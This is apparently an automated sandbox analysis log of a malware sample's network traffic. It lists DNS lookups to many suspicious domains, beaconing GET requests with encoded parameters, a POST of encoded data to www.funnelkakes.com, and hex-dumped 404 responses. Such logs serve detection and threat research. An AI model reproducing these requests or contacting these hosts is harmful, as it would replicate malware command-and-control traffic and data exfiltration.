            Source: global trafficHTTP traffic detected: GET /ka5q/?5HE=sbHYTBVMO+ZN3cimlSddhWyxOd9+ryqDwURfGp0ztBsxBU1bfXTxhmHIz6dWKnPi5VSox+9kY/vve8cZkTHpuVybjDJHaA/MeMU7Z/Kl4srSdSD7kaL79EM6BOjJOd/XEoe9QrfXL9O6&UXR=kTP8XfI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.nationsincbook.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2afv/?5HE=hLY9GbFjrTr/Z7Z1J1n+8mxvovTjHVjaQ1TETPlxVVMVYtq2nLqFQ+qvrj4cFtmldoUiHIajNLHyMvL4kY+KeK3n/v9QeqmigNuoWlpmTNFJx52laQwxR7zETdE9Da/cctIuDpSkBIav&UXR=kTP8XfI8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.karak-networks.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.marktuana.com
            Source: global trafficDNS traffic detected: DNS query: www.italyuntold.com
            Source: global trafficDNS traffic detected: DNS query: www.funnelkakes.com
            Source: global trafficDNS traffic detected: DNS query: www.shiybalinks.com
            Source: global trafficDNS traffic detected: DNS query: www.olhadeputat.com
            Source: global trafficDNS traffic detected: DNS query: www.jleabres.com
            Source: global trafficDNS traffic detected: DNS query: www.evoolihubs.shop
            Source: global trafficDNS traffic detected: DNS query: www.fardehb.top
            Source: global trafficDNS traffic detected: DNS query: www.sehraji.com
            Source: global trafficDNS traffic detected: DNS query: www.ecoaxion.com
            Source: global trafficDNS traffic detected: DNS query: www.809934.com
            Source: global trafficDNS traffic detected: DNS query: www.betano627.com
            Source: global trafficDNS traffic detected: DNS query: www.nationsincbook.com
            Source: global trafficDNS traffic detected: DNS query: www
            Source: global trafficDNS traffic detected: DNS query: www.karak-networks.online
            Source: global trafficDNS traffic detected: DNS query: www.gtprivatewealth.com
            Source: unknownHTTP traffic detected: POST /sgjw/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.funnelkakes.comOrigin: http://www.funnelkakes.comConnection: closeContent-Length: 216Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheReferer: http://www.funnelkakes.com/sgjw/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 35 48 45 3d 48 4b 4e 42 66 51 38 38 32 69 67 35 34 59 36 56 61 53 43 70 54 4c 53 6e 33 72 70 75 6a 34 75 31 48 53 42 59 52 74 59 75 45 78 37 70 59 35 4c 44 6b 41 70 54 7a 6a 49 45 35 50 34 5a 31 62 6a 6c 52 38 4e 6d 39 4f 70 61 48 6a 4b 73 4d 68 57 51 50 49 53 75 6c 67 35 78 6b 31 46 39 72 54 76 7a 50 7a 69 69 79 4f 71 66 50 48 34 46 65 68 78 6e 44 39 73 33 6c 64 49 71 35 33 6e 36 39 57 4e 79 67 73 53 36 41 43 30 34 72 33 61 58 55 6b 33 50 44 73 75 41 49 49 4e 69 62 4a 38 48 67 36 57 45 53 61 54 67 49 2b 4a 74 7a 52 6b 32 55 37 76 64 75 4e 46 78 6a 70 59 57 38 4d 66 68 47 6e 6f 34 69 67 30 70 4e 67 43 6a 47 73 66 4d 55 47 41 6a 63 67 3d 3d Data Ascii: 5HE=HKNBfQ882ig54Y6VaSCpTLSn3rpuj4u1HSBYRtYuEx7pY5LDkApTzjIE5P4Z1bjlR8Nm9OpaHjKsMhWQPISulg5xk1F9rTvzPziiyOqfPH4FehxnD9s3ldIq53n69WNygsS6AC04r3aXUk3PDsuAIINibJ8Hg6WESaTgI+JtzRk2U7vduNFxjpYW8MfhGno4ig0pNgCjGsfMUGAjcg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 21 Jul 2024 11:31:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=faQBi4XxkwYkG%2Bcusb%2B9g8AzfTGjvJyRW%2FefFCYEweeP1wm0z0v3JJny8cSPOQsO8Tn4%2BMWJrRwgL2If3ILE5ZFaQlSy4CHBzvZNBDAUw5kbQOwQFgMpDzF%2F3IzIk0q05Sl7Fx5K"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a6ade23bd2b0f87-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c 63 85 fa 90 d3 38 66 7c e3 bb e0 8d f2 3d 78 ae f9 8c f2 fd e4 05 ba 9d c4 3b 9c f2 0f 9c 2b cc 26 6d 61 91 48 85 f4 7b 8b c5 c2 c4 4b 06 67 48 af 2a f5 2d 72 36 73 5d d7 ad e3 0e 5f a1 07 27 74 95 df 35 ef 91 e6 ba 2d ad 67 8e 0f e5 61 c7 62 9d f8 e3 eb cb 36 47 43 39 8a b9 ce f7 30 b8 84 da bc ea 99 a5 25 ae b6 51 82 1a 1e 9e ac 3e b4 3d 3c eb d8 99 b2 6e e7 d4 3e bb f1 8f aa c7 88 ee 35 73 72 78 55 c6 e0 72 92 0b c5 34 13 dc 97 98 52 cd 0a 34 68 a7 41 db c6 52 c6 51 1e ce cf c6 a4 7b 2b cc d6 22 f7 6f f2 7d 2b cc b4 e7 fd e8 b6 6d 06 88 54 a3 55 ad 8e a3 6e c6 c9 d8 98 15 c0 e2 a9 55 f7 d0 0a 83 c4 0b 9f 50 16 28 61 2e a5 90 01 49 bc 30 20 31 2b ce d1 4d cd 66 3a a1 72 46 29 55 aa f5 9f b4 58 61 70 9c 29 83 85 20 19 fc d7 a5 48 06 0d 7c 18 2e 13 04 89 4a 6c 65 84 50 8a 2d 50 89 90 0a f1 cc f8 06 d6 42 42 c6 36 89 86 84 16 Data Ascii: 2afTo0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3Lc8f|=x;+&maH{KgH*-r6s]_'t5-gab6GC90%Q>=<n>5srxUr4R4hARQ{+"o
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 21 Jul 2024 11:32:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9DlxYB3gUIZr59Wek%2BG5QKdeJDlp6esF4zQdPZ3jb6EfSDAcTEWeTj6OZiMCuSKF5PO9GU2HxnPVWgNSAxEgRbLCxP8RVvR7BNc1KxZXXVwex%2B3O5qFGnCH6ZVJgEXkPzXHmyCo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a6ade345b560f6b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c 63 85 fa 90 d3 38 66 7c e3 bb e0 8d f2 3d 78 ae f9 8c f2 fd e4 05 ba 9d c4 3b 9c f2 0f 9c 2b cc 26 6d 61 91 48 85 f4 7b 8b c5 c2 c4 4b 06 67 48 af 2a f5 2d 72 36 73 5d d7 ad e3 0e 5f a1 07 27 74 95 df 35 ef 91 e6 ba 2d ad 67 8e 0f e5 61 c7 62 9d f8 e3 eb cb 36 47 43 39 8a b9 ce f7 30 b8 84 da bc ea 99 a5 25 ae b6 51 82 1a 1e 9e ac 3e b4 3d 3c eb d8 99 b2 6e e7 d4 3e bb f1 8f aa c7 88 ee 35 73 72 78 55 c6 e0 72 92 0b c5 34 13 dc 97 98 52 cd 0a 34 68 a7 41 db c6 52 c6 51 1e ce cf c6 a4 7b 2b cc d6 22 f7 6f f2 7d 2b cc b4 e7 fd e8 b6 6d 06 88 54 a3 55 ad 8e a3 6e c6 c9 d8 98 15 c0 e2 a9 55 f7 d0 0a 83 c4 0b 9f 50 16 28 61 2e a5 90 01 49 bc 30 20 31 2b ce d1 4d cd 66 3a a1 72 46 29 55 aa f5 9f b4 58 61 70 9c 29 83 85 20 19 fc d7 a5 48 06 0d 7c 18 2e 13 04 89 4a 6c 65 84 50 8a 2d 50 89 90 0a f1 cc f8 06 d6 42 42 c6 36 89 86 84 16 08 2b 44 0e 12 33 Data Ascii: 2a3To0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3Lc8f|=x;+&maH{KgH*-r6s]_'t5-gab6GC90%Q>=<n>5srxUr4R4hARQ
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 21 Jul 2024 11:32:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JLhXaCQoO%2Fg%2FS4kXZZzMSf6iCMfEsJC7wuHIHjKvgOsaEKfAa0VTadCSFm5%2FVnxyeEblOeDCbXCANW6GUtC1SD50Uix5NtbC8%2Fj6gTNmvWxai0AxHl3X2aEV%2B%2FjvrmHOEPU%2BHi4S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a6ade46f8b641ec-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c 63 85 fa 90 d3 38 66 7c e3 bb e0 8d f2 3d 78 ae f9 8c f2 fd e4 05 ba 9d c4 3b 9c f2 0f 9c 2b cc 26 6d 61 91 48 85 f4 7b 8b c5 c2 c4 4b 06 67 48 af 2a f5 2d 72 36 73 5d d7 ad e3 0e 5f a1 07 27 74 95 df 35 ef 91 e6 ba 2d ad 67 8e 0f e5 61 c7 62 9d f8 e3 eb cb 36 47 43 39 8a b9 ce f7 30 b8 84 da bc ea 99 a5 25 ae b6 51 82 1a 1e 9e ac 3e b4 3d 3c eb d8 99 b2 6e e7 d4 3e bb f1 8f aa c7 88 ee 35 73 72 78 55 c6 e0 72 92 0b c5 34 13 dc 97 98 52 cd 0a 34 68 a7 41 db c6 52 c6 51 1e ce cf c6 a4 7b 2b cc d6 22 f7 6f f2 7d 2b cc b4 e7 fd e8 b6 6d 06 88 54 a3 55 ad 8e a3 6e c6 c9 d8 98 15 c0 e2 a9 55 f7 d0 0a 83 c4 0b 9f 50 16 28 61 2e a5 90 01 49 bc 30 20 31 2b ce d1 4d cd 66 3a a1 72 46 29 55 aa f5 9f b4 58 61 70 9c 29 83 85 20 19 fc d7 a5 48 06 0d 7c 18 2e 13 04 89 4a 6c 65 84 50 8a 2d 50 89 90 0a f1 cc f8 06 d6 42 42 c6 36 Data Ascii: 2a3To0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3Lc8f|=x;+&maH{KgH*-r6s]_'t5-gab6GC90%Q>=<n>5srxUr4R4hARQ{+"o}+
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 21 Jul 2024 11:32:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I43eZN%2FxfKgbDsrxD3A1cnumjZqq3E3oa1BGwFR%2FRgaVpv56fLeYgZQIVDFMeeG%2BjpPm2l%2FEHFdJ%2FYduCvBMygvrCfkjyRAu9TJywKMpYEzaZQHO3OQzeTAasFNlnywMelKRSVxh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a6ade569f130cb8-EWRalt-svc: h3=":443"; ma=86400Data Raw: 34 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css"><!--body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 21 Jul 2024 11:32:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_c0b6e81f34d8775b85ef094bbfe3f4d8Content-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 21 Jul 2024 11:32:15 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_7a8f4592912729422423db5713491e65Content-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 21 Jul 2024 11:32:18 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_200340ef876e89d18ffe388d34538054Content-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 21 Jul 2024 11:32:21 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 544Connection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_044714c003d642aee30573eebe56373cData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 69 73 20 64 6f 6d 61 69 6e 2c 20 79 6f 75 20 63 61 6e 20 73 65 74 75 70 20 61 20 70 61 67 65 20 68 65 72 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 2e 68 65 6c 70 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 31 35 30 30 30 30 30 32 38 30 31 34 31 22 3e 63 72 65 61 74 69 6e 67 20 61 20 70 61 67 65 2f 77 65 62 73 69 74 65 20 69 6e 20 79 6f 75 72 20 61 63 63 